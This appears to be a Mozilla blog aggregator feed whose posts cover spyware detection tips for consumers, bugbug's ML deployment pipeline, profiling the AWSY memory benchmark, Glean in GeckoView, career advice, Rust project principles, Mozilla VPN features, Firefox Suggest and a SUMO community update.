Spyware has been in the news recently with stories like the Apple security vulnerability that allowed devices to be infected without the owner knowing it, and a former editor of The New York Observer being charged with a felony for unlawfully spying on his spouse with spyware. Spyware is a sub-category of malware that’s aimed at surveilling the behavior of human target(s) using a given device where the spyware is running. This surveillance could include but is not limited to logging keystrokes, capturing what websites you are visiting, looking at your locally stored files/passwords, and capturing audio or video within proximity to the device.

How does spyware work?

Spyware, much like any other malware, doesn’t just appear on a device. It often needs to first be installed or initiated. Depending on what type of device, this could manifest in a variety of ways, but here are a few specific examples:

  • You could visit a website with your web browser and a pop-up prompts you to install a browser extension or addon.
  • You could visit a website and be asked to download and install some software you weren’t there to get.
  • You could visit a website that prompts you to access your camera or audio devices, even though the website doesn’t legitimately have that need.
  • You could leave your laptop unlocked and unattended in a public place, and someone could install spyware on your computer.
  • You could share a computer or your password with someone, and they secretly install the spyware on your computer.
  • You could be prompted to install a new and unknown app on your phone.
  • You install pirated software on your computer, but this software additionally contains spyware functionality.

With all the above examples, the bottom line is that there could be software running with a surveillance intent on your device. Once installed, it’s often difficult for a lay person to have 100% confidence that their device can be trusted again, but for many the hard part is first detecting that surveillance software is running on your device.

How to detect spyware on your computer and phone

As mentioned above, spyware, like any malware, can be elusive and hard to spot, especially for a layperson. However, there are some ways by which you might be able to detect spyware on your computer or phone that aren’t overly complicated to check for.

Cameras

On many types of video camera devices, you get a visual indication that the video camera is recording. These are often a hardware controlled light of some kind that indicates the device is active. If you are not actively using your camera and these camera indicator lights are on, this could be a signal that you have software on your device that is actively recording you, and it could be some form of spyware. 

Here’s an example of what camera indicator lights look like on some Apple devices, but active camera indicators come in all kinds of colors and formats, so be sure to understand how your device works. A good way to test is to turn on your camera and find out exactly where these indicator lights are on your devices.

Additionally, you could make use of a webcam cover. These are small mechanical devices that allow users to manually open and shut cameras only when in use. These are generally a very cheap and low-tech way to protect snooping via cameras.

Applications

One pretty basic means to detect malicious spyware on systems is simply reviewing installed applications, and only keeping applications you actively use installed.

On Apple devices, you can review your applications folder and the app store to see what applications are installed. If you notice something is installed that you don’t recognize, you can attempt to uninstall it. For Windows computers, you’ll want to check the Apps folder in your Settings.

Web extensions

Many browsers, like Firefox or Chrome, have extensive web extension ecosystems that allow users to customize their browsing experience. However, it’s not uncommon for malware authors to utilize web extensions as a medium to conduct surveillance activities of a user’s browsing activity.

On Firefox, you can visit about:addons and view all your installed web extensions. On Chrome, you can visit chrome://extensions and view all your installed web extensions. You are basically looking for any web extensions that you didn’t actively install on your own. If you don’t recognize a given extension, you can attempt to uninstall it or disable it.


How do you remove spyware from your device?

If you recall an odd link, attachment, download or website you interacted with around the time you started noticing issues, that could be a great place to start when trying to clean your system. There are various free online tools you can leverage to help get a signal on what caused the issues you are experiencing. VirusTotal, UrlVoid and HybridAnalysis are just a few examples. These tools can help you determine when the compromise of your system occurred. How they can do this varies, but the general idea is that you give it the file or url you are suspicious of, and it will return a report to you showing what various computer security companies know about the file or url.

A point of infection combined with your browser’s search history would give you a starting point of various accounts you will need to double check for signs of fraudulent or malicious activity after you have cleaned your system. This isn’t entirely necessary in order to clean your system, but it helps jumpstart your recovery from a compromise.

There are a couple of paths that can be followed in order to make sure any spyware is entirely removed from your system and give you peace of mind:

Install an antivirus (AV) software from a well-known company and run scans on your system

  • If you have a Windows device, Windows Defender comes pre-installed, and you should double-check that you have it turned on.
  • If you currently have an AV software installed, make sure it’s turned on and that it’s up to date. Should it fail to identify and remove the spyware from your system, then it’s on to one of the following options.

Run a fresh install of your system’s operating system

  • While it might be tempting to back up the files you have on your system, be careful: your device was compromised, and the file causing the issue could end up back on your system and compromise it again.
  • The best way to do this would be to wipe the hard drive of your system entirely, and then reinstall from an external device.

How can you protect yourself from getting spyware?

There are a lot of ways to help keep your devices safe from spyware, and in the end it can all be boiled down to employing a little healthy skepticism and practicing good basic digital hygiene. These tips will help you stay on the right track:

Be wary. Don’t click on links, open/download attachments from unknown senders. This applies to both messaging apps as well as emails. 

Stay updated. Take the time to install updates/patches. This helps make sure your devices and apps are protected against known issues.

Check legitimacy. If you aren’t sure if a website or email is giving legitimate information, take the time to use your favorite search engine to find the legitimate website. This helps avoid issues with typos potentially leading you to a bad website.

Use strong passwords. Ensure all your devices have solid passwords that are not shared. It’s easier to break into a house that isn’t locked.

Delete extras. Remove applications you don’t use anymore. This reduces the total attack surface you are exposing, and has the added bonus of saving space for things you care about.

Use security settings. Enable built in browser security features. By default, Firefox is on the lookout for malware and will alert you to Deceptive Content and Dangerous Software.

The post Did you hear about Apple’s security vulnerability? Here’s how to find and remove spyware. appeared first on The Mozilla Blog.

Marco Castellucciobugbug infrastructure: continuous integration, multi-stage deployments, training and production services

bugbug started as a project to automatically assign a type to bugs (defect vs. enhancement vs. task; back when we introduced the “type” field, we needed a way to fill it in for already existing bugs), and then evolved to be a platform to build ML models on bug reports: we now have many models, some of which are being used on Bugzilla, e.g. to assign a type, to assign a component, to close bugs detected as spam, to detect “regression” bugs, and so on.

Then, it evolved to be a platform to build ML models for generic software engineering purposes: we now no longer only have models that operate on bug reports, but also on test data, patches/commits (e.g. to choose which tests to run for a given patch and to evaluate the regression riskiness associated to a patch), and so on.

Its infrastructure also evolved over time and slowly became more complex. This post attempts to clarify its overall infrastructure, composed of multiple pipelines and multi-stage deployments.

A nice aspect of the continuous integration, deployment and production services of bugbug is that almost all of them run entirely on Taskcluster, with a common language to define tasks, resources, and so on.

In bugbug’s case, I consider a release as a code artifact (source code at a given tag in our repo) plus the ML models that were trained with that code artifact and the data that was used to train them. This is because the results of a given model are influenced by all these aspects, not just the code as in other kinds of software. Thus, in the remainder of this post, I will refer to “code artifact” or “code release” when talking about a new version of the source code, and to “release” when talking about a set of artifacts that were built with a specific snapshot (version) of the source code and with a specific snapshot of the data.

The overall infrastructure can be seen in this flowchart, where the nodes represent artifacts and the subgraphs represent the set of operations performed on them. The following sections of this post describe the components of the flowchart in more detail.

Flowchart of the bugbug infrastructure

Continuous Integration and First Stage (Training Pipeline) Deployment

Every pull request and push to the repository triggers a pipeline of Taskcluster tasks to:

  • run tests for the library and its linked HTTP service;
  • run static analysis and linting;
  • build Python packages;
  • build the frontend;
  • build Docker images.

Code releases are represented by tags. A push of a tag triggers additional tasks that perform:

  • integration tests;
  • push of Docker images to DockerHub;
  • release of a new version of the Python package on PyPI;
  • update of the training pipeline definition.

After a code release, the training pipeline (which performs the ML training) is updated, but the HTTP service, the frontend and all the production pipelines that depend on the trained ML models (the actual release) are still on the previous version of the code (since they can’t be updated until the new models are trained).

Continuous Training and Second Stage (ML Model Services) Deployment

The training pipeline runs on Taskcluster as a hook that is either triggered manually or on a cron.

The training pipeline consists of many tasks that:

  • retrieve data from multiple sources (version control system, bug tracking systems, Firefox CI, etc.);
  • generate intermediate artifacts that are used by later stages of the pipeline, by other pipelines, or by other services;
  • train ML models using the above (some training tasks depend on other models being trained and run first, to generate intermediate artifacts);
  • check training metrics to ensure there are no short term or long term regressions;
  • run integration tests with the trained models;
  • build Docker images with the trained models;
  • push Docker images with the trained models;
  • update the production pipelines definition.

After a run of the training pipeline, the HTTP service and all the production pipelines are updated to the latest version of the code (if they weren’t already) and to the latest version of the trained models.

Production pipelines

There are multiple production pipelines (here’s an example) that serve different objectives, all running on Taskcluster and triggered either on cron or by pulse messages from other services.

Frontend

The bugbug UI lives at https://changes.moz.tools/, and it is simply a static frontend built in one of the production pipelines defined in Taskcluster.

The production pipeline performs a build and uploads the resulting artifact to S3 via Taskcluster; the artifact is then exposed at the URL mentioned earlier.

HTTP Service

The HTTP service is the only piece of the infrastructure that is not running on Taskcluster, but currently on Heroku.

The Docker images for the service are built as part of the training pipeline in Taskcluster; the trained ML models are included in the images themselves. This way, it is possible to roll back to an earlier version of the code and models, should a new one present a regression.

There is one web worker that answers requests from users, and multiple background workers that perform ML model evaluations. These must be done in the background for performance reasons (the web worker must answer quickly). The ML evaluations themselves are quick, and so could be done directly in the web worker, but the input data preparation can be slow, as it requires interaction with external services such as Bugzilla or a remote Mercurial server.
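
As a rough sketch of that split (not bugbug’s actual service code; this assumes a Flask web worker and a Redis-backed RQ queue, with classify_bug as a stand-in for the real evaluation function):

from flask import Flask, jsonify
from redis import Redis
from rq import Queue

app = Flask(__name__)
queue = Queue(connection=Redis())  # background workers consume jobs from here

def classify_bug(bug_id):
    # Runs in a background worker: fetching the bug from Bugzilla and
    # preparing features is the slow part; the model evaluation is quick.
    raise NotImplementedError

@app.route("/classify/<int:bug_id>")
def classify(bug_id):
    # The web worker only enqueues the job and answers immediately.
    job = queue.enqueue(classify_bug, bug_id)
    return jsonify({"ready": False, "job": job.id}), 202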

Paul BoneRunning the AWSY benchmark in the Firefox profiler

The are-we-slim-yet (AWSY) benchmark measures memory usage. Recently I made a simple change to Firefox that I expected might save a bit of memory; instead, it increased memory usage on the AWSY benchmark.

We have lots of tools to hunt down memory usage problems. But to see an almost-chronological “log” of when garbage collection and cycle collection occur, the Firefox profiler is amazing.

I wanted to profile the AWSY benchmark to try and understand what was happening with GC scheduling. But it didn’t work out-of-the-box. This is one of those blog posts that I’m writing down so that next time this happens, to me or anyone else, the answer is easy to find. Selfishly, when I web-search for "AWSY and Firefox Profiler", I want this to be the number 1 result and help me (or someone else) out.

The normal instructions

First you need a build with profiling enabled. Put this in your mozconfig:

ac_add_options --enable-debug
ac_add_options --enable-debug-symbols
ac_add_options --enable-optimize
ac_add_options --enable-profiling

The instructions to get the profiler to run came from Ted Campbell. Thanks Ted.

Ted’s instructions disabled stack sampling; we didn’t care about that, since the data we need comes from profile markers. I can also run a reduced AWSY test, because 10 entities are enough to reproduce the problem.

export MOZ_PROFILER_STARTUP=1
export MOZ_PROFILER_SHUTDOWN=awsy-profile.json
export MOZ_PROFILER_STARTUP_FEATURES="nostacksampling"
./mach awsy-test --tp6 --headless --iterations 1 --entities 10

But it crashes due to Bug 1710408.

So I can’t use nostacksampling, which would have been nice to save some memory/disk space, but never mind.

So I removed that option, but then I got profiles that were too short. The profiler records into a circular buffer, so if that buffer is too small it discards the earlier information. In this case I want the earlier information, because I think something at the beginning is the problem. So I need to add this to get a bigger buffer (the default is 4 million entries, or 32MB):

export MOZ_PROFILER_STARTUP_ENTRIES=$((200*1024*1024))

But now the profiles are too big and Firefox shutdown times out (over 70 seconds), so the Marionette test driver kills Firefox before it can write out the profile.

The solution

So we hack testing/marionette/client/marionette_driver/marionette.py to replace shutdown_timeout with 300 in some places. Setting DEFAULT_SHUTDOWN_TIMEOUT and also self.shutdown_timeout to 300 will do. There’s probably a way to pass a parameter, but I haven’t found it yet.
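
For reference, the change is roughly the following (a sketch, not an exact diff; the surrounding code in marionette.py may differ):

# testing/marionette/client/marionette_driver/marionette.py
DEFAULT_SHUTDOWN_TIMEOUT = 300  # was 70; give Firefox time to write the large profile

# ...and in Marionette.__init__, pin the instance attribute as well:
#     self.shutdown_timeout = 300

After making that change and running ./mach build, the invocation is now: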

export MOZ_PROFILER_STARTUP=1
export MOZ_PROFILER_SHUTDOWN=awsy-profile.json
export MOZ_PROFILER_STARTUP_FEATURES=""
export MOZ_PROFILER_STARTUP_ENTRIES=$((200*1024*1024))
./mach awsy-test --tp6 --headless --iterations 1 --entities 10

And it writes an awsy-profile.json into the root directory of the project.

Hurray!

Jan-Erik RedigerThis Week in Glean: Glean & GeckoView

(“This Week in Glean” is a series of blog posts that the Glean Team at Mozilla is using to try to communicate better about our work. They could be release notes, documentation, hopes, dreams, or whatever: so long as it is inspired by Glean.) All "This Week in Glean" blog posts are listed in the TWiG index (and on the Mozilla Data blog). This article is cross-posted on the Mozilla Data blog.


This is a followup post to Shipping Glean with GeckoView.

It landed!

It took us several more weeks to put everything into place, but we're finally shipping the Rust parts of the Glean Android SDK with GeckoView, and consuming that in Android Components and Fenix. And it all still works: it collects data and sends pings! This also results in a slightly smaller APK.

This unblocks further work now. Currently Gecko simply stubs out all calls to Glean when compiled for Android, but we will enable recording Glean metrics within Gecko and exposing them in pings sent from Fenix. We will also start work on moving other Rust components into mozilla-central in order for them to use the Rust API of Glean directly. Changing how we deliver the Rust code also made testing Glean changes across these different components a bit more challenging, so I want to invest some time to make that easier again.

The Mozilla BlogThe Great Resignation: New gig? Here are 7 tips to ensure success

If recent surveys and polls ring true, over 46% of the global workforce is considering leaving their employer this year. While COVID-19 caused initial turnover through the related economic downturn, the current phenomenon, coined “The Great Resignation”, is attributed to the many job seekers choosing to leave their current employment voluntarily. Mass vaccinations and mask mandates have allowed offices to re-open just as job seekers are reassessing work-life balance, making bold moves to take control of where they choose to live and work.

The “New Normal”

Millions of workers have adjusted to remote-flexible work arrangements, finding success and a greater sense of work-life balance. The question is whether or not employers will permanently allow this benefit post-pandemic.

Jerry Lee, COO/Founder of the career development consultancy Wonsulting, sees changes coming to the workplace power dynamic.

“In the future of work, employers will have to be much more employee-first beyond monetary compensation,” he said. “There is a shift of negotiating power moving from the employers to the employees, which calls for company benefits and work-life balance to improve.” 

Abbie Duckham, Talent Operations Program Manager at Mozilla, believes the days of companies choosing people are long over. 

“From a hiring lens, it’s no longer about companies choosing people, it’s about people choosing companies,” Duckham said. “People are choosing to work at companies that, yes, value productivity and revenue – but more-so companies that value mental health and understand that every single person on their staff has a different home life or work-life balance.”

Drop the mic and cue the job switch

So, how can recent job switchers or job seekers better prepare for their next big move? The following tips and advice from career and talent sourcing experts can help anyone perform their best while adapting to our current pandemic reality.

Take a vacation *seriously*

“When starting a new role, many are keen to jump into work right away; however, it’s always important to take a mental break between your different roles before you start another onboarding process,” advises Jonathan Javier, CEO/Founder at Wonsulting. “One way to do this is to plan your vacations ahead of your switch: that trip to Hawaii you always wanted? Plan it right after you end your job. That time you wanted to spend with your significant other? Enjoy that time off.”

It also never hurts to negotiate a start date that prioritizes your mental preparedness and well-being.

Out with the old and in with that new-new

When Duckham started at Mozilla, she made it her mission to absorb every bit of the manifesto to better understand Mozilla’s culture. “From there I looked into what we actually do as a company. Setting up a Firefox account was pretty crucial since we are all about dog-fooding here (or as we call it, foxfooding), as was downloading Firefox Nightly, the latest snapshot of the browser as our developers are actively working on it.”

Duckham also implores job-switchers to rebrand themselves. 

“You have a chance to take everything you wanted your last company to know about you and restart,” she said. “Take everything you had imposter syndrome about and flip the switch.”

Network early

“When you join a new company, it’s important to identify the subject matter experts for different functions of your company so you know who you can reach out to if you have any questions or need insights,” Javier said.

Javier also recommends networking with people who have also switched jobs. 

“You can search for and find people who switched from non-tech roles to an in-tech role by simply searching for ‘Past Company’ at a non-tech company and then putting ‘Current Company’ at a tech company on LinkedIn,” he said.

Brain-breaks 

Duckham went as far as giving her digital workspace a refreshing overhaul when she started at Mozilla. 

“I cleaned off my desktop, made folders for storing files, and essentially crafted a blank working space to start fresh from my previous company – effectively tabula rasa-ing my digital workspace did the same for my mental state as I prepared to absorb tons of new processes and practices.”

In that same vein, when you need a bit of a brain-break throughout the work day and that break leads you to social media, Duckham advises downloading Facebook Container, a browser extension that makes it harder for Facebook to track you on the web outside of Facebook.

“Speaking of brain-breaks, if socials aren’t your thing and you’d rather catch up on written curated content from around the web, Pocket is an excellent way to let your mind wander and breathe during the work day so you’re able return to work a little more refreshed,” Duckham added.

Making remote friends and drawing boundary lines

56% of Mozilla employees signed in to work from remote locations all over the world, even before the pandemic. Working asynchronously across so many time zones can be unusual for new teammates. Duckham’s biggest tip for new Mozillians? 

“Be open and a little vulnerable. Do you need to take your kid to school every day, does your dog require a mid-day walk? Chances are your schedule is just as unique as the person in the Zoom window next to you. Be open about the personal time you need to take throughout the day and then build your work schedule around it.” 

But what about building camaraderie and remote friendships?

“In a traditional work environment, you might run into your colleagues in the break room and have a quick chat. As roles continue to become more remote or hybrid-first, it is important to create opportunities for you to mingle with your colleagues,” Jerry Lee of Wonsulting said. “These small interactions are what builds long-lasting friendships, which in turn allows you to feel more comfortable and productive at work.”

How to leverage pay, flexibility and other benefits even if you aren’t job searching

“The best leverage you can find in this job market is clearly defining what is important to you and making sure you have that option in your role,” Lee said.

He’s not wrong. Make sure to consider your current growth opportunities, autonomy, location, work-life flexibility and compensation, of course. For example, if you are looking for a flexible-remote arrangement, Lee suggests clearly articulating what it is you want to your manager using the following talk-track as a guide:

Hey Manager!

I’m looking for ways to better incorporate my work into my personal life, and I’ve realized one important factor for me is location flexibility. I’m looking to move around a bit in the next few years but would love to continue the work I have here.

What can we do to make this happen?

Once you make your request, you’ll need to work with your manager to ensure your productivity and impact improve or at least remain the same.

Finally, it’s always helpful to remind yourself that every ‘big’ career move is the result of several smaller moves. If you’re looking to make a switch or simply reassessing your current work-life balance, Javier recommends practicing vision boarding. “I do this by drawing my current state and what I want my future state to look like,” said Javier. “Even if your drawings are subpar, you’ll be able to visualize what you want to accomplish in the future and make it into reality.”

As the Great Resignation continues, it is important to keep in mind that getting a new job is just the start of the journey. There are important steps you can take, and Firefox and Pocket can help, to make sure you feel ready for your next career adventure.

Firefox browser logo

Get Firefox

Get the browser that protects what’s important

About our experts

Jonathan Javier is the CEO/Founder of Wonsulting, whose mission is to “turn underdogs into winners”. He’s also worked in Operations at Snap, Google, and Cisco, coming from a non-target school/non-traditional background. He works on many initiatives, providing advice and words of wisdom on LinkedIn and through speaking engagements. In total, he has led 210+ workshops in 9 different countries, including the MENA ICT Forum in Jordan, Resume/Personal Branding at Cisco, LinkedIn Strategy & Operations Offsite, Great Place To Work, Talks at Google, TEDx, and more. He’s been featured on Forbes, Fox News, Business Insider, The Times, LinkedIn News, Yahoo! News, Jobscan, and Brainz Magazine as a top job search expert, and has amassed 1M+ followers on LinkedIn, Instagram, and TikTok, as well as 30+ million impressions monthly on his content.

Jerry Lee is the COO/Founder of Wonsulting, an ex-Senior Strategy & Operations Manager at Google, and a former lead of Product Strategy at Lucid. He is from Torrance, California and graduated summa cum laude from Babson College. After graduating, Jerry was hired as the youngest analyst in his organization, and was promoted multiple times in 2 years. After he left Google, he was the youngest person to lead a strategy team at Lucid. Jerry partners with universities & organizations (220+ to date) to help others land their dream careers. He has 250K+ followers across LinkedIn, TikTok & Instagram and has reached 40M+ professionals. In addition, his work has been featured on Forbes, Newsweek, Business Insider, Yahoo! News, and LinkedIn, and he was elected the 2020 LinkedIn Top Voice for Tech.

Abbie Duckham is the current Talent Operations Program Manager at Mozilla. She has been with the company since 2016, working out of the San Francisco Office, and now her home office in Oakland.

The post The Great Resignation: New gig? Here are 7 tips to ensure success appeared first on The Mozilla Blog.

Niko MatsakisRustacean Principles, continued

RustConf is always a good time for reflecting on the project. For me, the last week has been particularly “reflective”. Since announcing the Rustacean Principles, I’ve been having a number of conversations with members of the community about how they can be improved. I wanted to write a post summarizing some of the feedback I’ve gotten.

The principles are a work-in-progress

Sparking conversation about the principles was exactly what I was hoping for when I posted the previous blog post. The principles have mostly been the product of Josh and me iterating, and hence reflect our experiences. While the two of us have been involved in quite a few parts of the project, for the document to truly serve its purpose, it needs input from the community as a whole.

Unfortunately, for many people, the way I presented the principles made it seem like I was trying to unveil a fait accompli, rather than seeking input on a work-in-progress. I hope this post makes the intention more clear!

The principles as a continuation of Rust’s traditions

Rust has a long tradition of articulating its values. This is why we have a Code of Conduct. This is why we wrote blog posts like Fearless Concurrency, Stability as a Deliverable and Rust Once, Run Anywhere. Looking past the “engineering side” of Rust, aturon’s classic blog posts on listening and trust (part 1, part 2, part 3) did a great job of talking about what it is like to be on a Rust team. And who could forget the whole “fireflowers” debate?1

My goal with the Rustacean Principles is to help coalesce the existing wisdom found in those classic Rust blog posts into a more concise form. To that end, I took initial inspiration from how AWS uses tenets, although by this point the principles have evolved into a somewhat different form. I like the way tenets use short, crisp statements that identify important concepts, and I like the way assigning a priority ordering helps establish which should have priority. (That said, one of Rust’s oldest values is synthesis: we try to find ways to resolve constraints that are in tension by having our cake and eating it too.)

Given all of this backdrop, I was pretty enthused by a suggestion that I heard from Jacob Finkelman. He suggested adapting the principles to incorporate more of the “classic Rust catchphrases”, such as the “no new rationale” rule described in the first blog post from aturon’s series. A similar idea is to incorporate the lessons from RFCs, both successful and unsuccessful (this is what I was going for in the case studies section, but that clearly needs to be expanded).

The overall goal: Empowerment

My original intention was to structure the principles as a cascading series of ideas:

  • Rust’s top-level goal: Empowerment
    • Principles: Dissecting empowerment into its constituent pieces – reliable, performant, etc – and analyzing the importance of those pieces relative to one another.
      • Mechanisms: Specific rules that we use, like type safety, that engender the principles (reliability, performance, etc.). These mechanisms often work in favor of one principle, but can work against others.

wycats suggested that the site could do a better job of clarifying that empowerment is the top-level, overriding goal, and I agree. I’m going to try and tweak the site to make it clearer.

A goal, not a minimum bar

The principles in “How to Rustacean” were meant to be aspirational: a target to be reaching for. We’re all human: nobody does everything right all the time. But, as Matklad describes, the principles could be understood as setting up a kind of minimum bar – to be a team member, one has to show up, follow through, trust and delegate, all while bringing joy? This could be really stressful for people.

The goal for the “How to Rustacean” section is to be a way to lift people up by giving them clear guidance for how to succeed; it helps us to answer people when they ask “what should I do to get onto the lang/compiler/whatever team”. The internals thread had a number of good ideas for how to help it serve this intended purpose without stressing people out, such as cuviper’s suggestion to use fictional characters like Ferris in examples, passcod’s suggestion of discussing inclusion, or Matklad’s proposal to add something to the effect of “You don’t have to be perfect” to the list. Iteration needed!

Scope of the principles

Some people have wondered why the principles are framed in a rather general way, one that applies to all of Rust, instead of being specific to the lang team. It’s a fair question! In fact, they didn’t start this way. They started their life as a rather narrow set of “design tenets for async” that appeared in the async vision doc. But as those evolved, I found that they were starting to sound like design goals for Rust as a whole, not specifically for async.

Trying to describe Rust as a “coherent whole” makes a lot of sense to me. After all, the experience of using Rust is shaped by all of its facets: the language, the libraries, the tooling, the community, even its internal infrastructure (which contributes to that feeling of reliability by ensuring that the releases are available and high quality). Every part has its own role to play, but they are all working towards the same goal of empowering Rust’s users.2

There is an interesting question about the long-term trajectory for this work. In my mind, the principles remain something of an experiment. Presuming that they prove to be useful, I think that they would make a nice RFC.

What about “easy”?

One final bit of feedback I heard from Carl Lerche is surprise that the principles don’t include the word “easy”. This is not an accident. I felt that “easy to use” was too subjective to be actionable, and that the goals of productive and supportive were more precise. However, I do think that for people to feel empowered, it’s important for them not to feel mentally overloaded, and Rust can definitely impose a high mental load sometimes.

I’m not sure of the best way to tweak the “Rust empowers by being…” section to reflect this, but the answer may lie with the Cognitive Dimensions of Notation. I was introduced to these by Felienne Hermans’ excellent book The Programmer’s Brain; I quite enjoyed this journal article as well.

The idea of the CDN is to try and elaborate on the ways that tools can be easier or harder to use for a particular task. For example, Rust would likely do well on the “error prone” dimension, in that when you make changes, the compiler generally helps ensure they are correct. But Rust does tend to have a high “viscosity”, because making local changes tends to be difficult: adding a lifetime, for example, can require updating data structures all over the code in an annoying cascade.

It’s important though to keep in mind that the CDN will vary from task to task. There are many kinds of changes one can make in Rust with very low viscosity, such as adding a new dependency. On the other hand, there are also cases where Rust can be error prone, such as mixing async runtimes.

Conclusion

In retrospect, I wish I had introduced the concept of the Rustacean Principles in a different way. But the subsequent conversations have been really great, and I’m pretty excited by all the ideas on how to improve them. I want to encourage folks again to come over to the internals thread with their thoughts and suggestions.

  1. Love that web page, brson

  2. One interesting question: I do think that some tools may vary the prioritization of different aspects of Rust. For example, a tool for formal verification is obviously aimed at users that particularly value reliability, but other tools may have different audiences. I’m not sure yet the best way to capture that, it may well be that each tool can have its own take on the way that it particularly empowers. 

The Mozilla BlogMozilla VPN adds advanced privacy features: Custom DNS servers and Multi-hop

Your online privacy remains our top priority, and we know that one of the first steps to securing your privacy online is to get on a Virtual Private Network (VPN), an encrypted connection that serves as a tunnel between your computer and the VPN server. Today, we’re launching the latest release of Mozilla VPN, our fast and easy-to-use VPN service, with two new advanced privacy features that offer additional layers of privacy. The first is your choice of Domain Name System (DNS) server: the default we’ve provided, one of our suggested ad blocking, tracker blocking, or ad-plus-tracker-blocking DNS servers, or an alternative of your own. The second is the Multi-hop feature, which routes your traffic through two different servers for an added layer of encryption. Today’s Mozilla VPN release is available on Windows, Mac, Linux and Android platforms, and will be available on iOS later this week.

Here are today’s Mozilla VPN Features:

Uplevel your privacy with Mozilla VPN’s Custom DNS server feature

Traditionally, when you go online your traffic is routed through your Internet Service Provider’s (ISP) DNS servers, which may keep records of your online activities. DNS (Domain Name System) is like a phone book for domains, the websites that you visit. One of the advantages of using a VPN is shielding your online activity from your ISP by using your trusted VPN service provider’s DNS servers instead. There are a variety of DNS servers to choose from: ones that offer additional features like tracker blocking, ad blocking, or a combination of both, and local DNS servers that offer those benefits along with speed.

Now, with today’s Custom DNS server feature, we put you in control of choosing the DNS server that fits your needs. You can find this feature in your Network Settings under Advanced DNS Settings. From there, you can choose the default DNS server, enter your local DNS server, or choose from the recommended list of DNS servers available to you.

<figcaption>Choose from the recommended list of DNS servers available to you</figcaption>

Double up your VPN service with Mozilla’s VPN Multi-hop feature

We’re introducing our Multi-hop feature, also known as doubling up your VPN, because instead of using one VPN server you can use two. Here’s how it works: first, your online activity is routed through one VPN server. Then, with the Multi-hop feature selected, your online activity is routed a second time through an extra VPN server, known as your exit server. In short, you will have two VPN servers: the entry VPN server and the exit VPN server. This powerful new privacy feature appeals to those who think twice about their privacy, like political activists, journalists writing on sensitive topics, or anyone using public wi-fi who wants the added peace of mind of doubling up their VPN servers.

To turn on this new feature, go to your Location, then choose Multi-hop. From there, you can choose your entry server location and your exit server location. The exit server location will be your main VPN server. We will also list your two most recent Multi-hop connections so you can reuse them in the future.

<figcaption>Choose your entry server location and your exit server location</figcaption>
<figcaption>Your two recent Multi-hop connections will also be listed and available to reuse in the future</figcaption>

How we innovate and build features for you with Mozilla VPN

Mozilla is a mission-driven company with a 20-year track record of fighting for online privacy and a healthier internet, and we are committed to innovating and bringing new features to the Mozilla VPN. Mozilla periodically works with third-party organizations to complement our internal security programs and help improve the overall security of our products. Mozilla recently published an independent security audit of its Mozilla VPN by Cure53, a cybersecurity firm based in Berlin with more than 15 years of experience in software testing and code auditing. Here is a link to the blog post and the security audit for more details.

We know that it’s more important than ever for you to be safe, and for you to know that what you do online is your own business. By subscribing to Mozilla VPN, users support both Mozilla’s product development and our mission to build a better web for all. Check out the Mozilla VPN and subscribe today from our website.

For more on Mozilla VPN:

Mozilla VPN Completes Independent Security Audit by Cure53

Celebrating Mozilla VPN: How we’re keeping your data safe for you

Latest Mozilla VPN features keep your data safe

Mozilla Puts Its Trusted Stamp on VPN

The post Mozilla VPN adds advanced privacy features: Custom DNS servers and Multi-hop appeared first on The Mozilla Blog.

The Mozilla BlogGet where you’re going faster, with Firefox Suggest

Today, people have to work too hard to find what they want online, sifting through and steering clear of content, clutter and click-bait not worthy of their time. Over time, navigation on the internet has become increasingly centralized and optimized for clicks and scrolling, not for getting people to where they want to go or what they are looking for quickly. 

We’d like to help change this, and we think Firefox is a good place to start.

Today we’re announcing our first step towards doing that with a new feature called Firefox Suggest.

Firefox Suggest is a new discovery feature that is built directly into the browser. Firefox Suggest acts as a trustworthy guide to the better web, surfacing relevant information and sites to help people accomplish their goals. Check it out here:

Relevant, reliable answers: 

Firefox already helps people search their browsing history and tabs and use their preferred search engine directly from Firefox’s Awesome Bar. 

Firefox Suggest will enhance this by including other sources of information such as Wikipedia, Pocket articles, reviews and credible content from sponsored, vetted partners and trusted organizations. 

For instance, suppose someone types “Costa Rica” into the Awesome Bar; they might see a result from Wikipedia:

<figcaption>Firefox users can find suggestions from Wikipedia</figcaption>

Firefox Suggest also contains sponsored suggestions from vetted partners. For instance, if someone types in “vans”, we might show a sponsored result for Vans shoes on eBay:

<figcaption>Firefox users can find sponsored suggestions from vetted partners</figcaption>

We are also developing contextual suggestions. These aim to enhance and speed up your searching experience. To deliver contextual suggestions, Firefox will need to send Mozilla new data, specifically, what you type into the search bar, city-level location data to know what’s nearby and relevant, as well as whether you click on a suggestion and which suggestion you click on.

In your control:

As always, we believe people should be in control of their web experience, so Firefox Suggest will be a customizable feature. 

We’ll begin offering contextual suggestions to a percentage of people in the U.S. as an opt-in experience. 

<figcaption>Opt-in prompt for smarter, contextual suggestions</figcaption>

Find out more about the ways you can customize this experience here.

Unmatched privacy: 

We believe online ads can work without advertisers needing to know everything about you. So when people choose to enable smarter suggestions, we will collect only the data that we need to operate, update and improve the functionality of Firefox Suggest and the overall user experience based on our Lean Data and Data Privacy Principles. We will also continue to be transparent about our data and data collection practices as we develop this new feature.

A better web:

The internet has so much to offer, and we want to help people get the best out of it faster and easier than ever before.

Firefox is the choice for people who want to experience the web as a purpose-driven and independent company envisions it. We create software for people that provides real privacy, transparency and valuable help with navigating today’s internet. This is another step in our journey to build a better internet.

The post Get where you’re going faster, with Firefox Suggest appeared first on The Mozilla Blog.

Support.Mozilla.OrgWhat’s up with SUMO – September 2021

Hey SUMO folks,

September is going to be the last month for Q3, so let’s see what we’ve been up to for the past quarter.

Welcome on board!

  1. Welcome to the SUMO family, Bithiah, mokich1one, handisutrian, and Pomarańczarz. Bithiah has been pretty active in contributing to the support forum for a while now, while mokich1one, handisutrian, and Pomarańczarz are emerging localization contributors for Japanese, Bahasa Indonesia, and Polish respectively.

Community news

  • Read our post about the advanced customization in the forum and KB here and let us know if you still have any questions!
  • Please join me to welcome Abby into the Customer Experience Team. Abby is our new Content Manager who will be in charge of our Knowledge Base as well as Localization effort. You can learn more about Abby soon.
  • Learn more about Firefox 92 here.
  • Can you imagine what’s gonna happen when we reach version 100? Learn more about the experiment we’re running in Firefox Nightly here and see how you can help!
  • Are you a fan of Firefox Focus? Join our upcoming foxfooding campaign for Focus. You can learn more about the campaign here.
  • No Kitsune update for this month. Check out SUMO Engineering Board instead to see what the team is currently doing.

Community call

  • Watch the monthly community call if you haven’t. Learn more about what’s new in August!
